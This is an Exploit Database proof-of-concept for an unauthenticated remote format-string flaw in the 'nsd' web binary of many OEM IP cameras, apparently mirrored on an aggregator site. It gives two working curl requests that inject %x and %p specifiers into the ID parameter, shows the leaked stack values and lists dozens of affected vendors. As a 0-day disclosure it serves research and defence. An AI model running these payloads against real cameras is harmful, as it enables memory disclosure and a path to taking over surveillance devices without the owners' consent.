Multiple OEM – ‘nsd’ Remote Stack Format String (PoC)

• Exploit Database
• 140 阅读

• 作者： bashis
  日期： 2017-12-14
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/43998/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124

  [STX]   Subject: Remote Stack Format String in &apos;nsd&apos; binary from multiple OEM   Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 14, 2017 Full Disclosure: 0-Day     -[ PoC ]-   1) $ curl &apos;http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB&apos;   [...] function initHideWidget(){ document.getElementById("devip").value = "192.168.57.20"; document.getElementById("cameraid").value = 1; document.getElementById("streamid").value = 1; document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069"; document.getElementById("lg").value = "BBBB"; document.getElementById("port").value = 60000; document.getElementById("ipver").value = 1; document.getElementById("tprotocol").value = 2; document.getElementById("devtype").value = 1; document.getElementById("ismotorize").value = 1;   [...] Note: &apos;BBBB&apos; are hiding within &apos;5e3006db&apos;   2) curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p" [...] function initHideWidget(){ document.getElementById("ip").value = "192.168.57.20"; document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1"; document.getElementById("port").value = 60000; document.getElementById("ipver").value = 1; document.getElementById("tprotocol").value = 2; document.getElementById("devtype").value = 1; [...]     -[ Affected OEM ]-   Huatu I-View IP Camera Web Service Stanley Security 3D Eyes CCTV Platform Protech Srl LS vision GWSECU 12 Legion Solution HDVuk IP Camera Intervid Security Suzuki Tech Wellsite IP Camera iBrido Protec IP Camera Maxtron IP Camera Ascendent GTvs IP Camera Squilla Bikal IP Camera MW Power Alfa Vision KMA Security Tough Dog Security Kpro HQ Lanetwork AFM Vision ZetaDo Jobsight Inc. Datalab IP Technologies 4Tvision Proline UK Tanz Aisonic HD-IP PreSec Security Solution EagleVision Elemis Delta Imenara Gigamedia Xavee Honeywell Boss Security A.R.T Surveillance Global Security Securicorp Securetech Vapplica Star Stic NeXus Alnet Spy Smart Kompsos Adler Security Systems Nextan Access Toprotect Kawah LS StrateX Senpei CCTV Metcom AFM Vision Doron Technologies Saviour Smart IoT Systems Eagle-Eye Faucon.at BlueEagle Security Campro Opple Level One Video and Monitor System K&D   [ETX]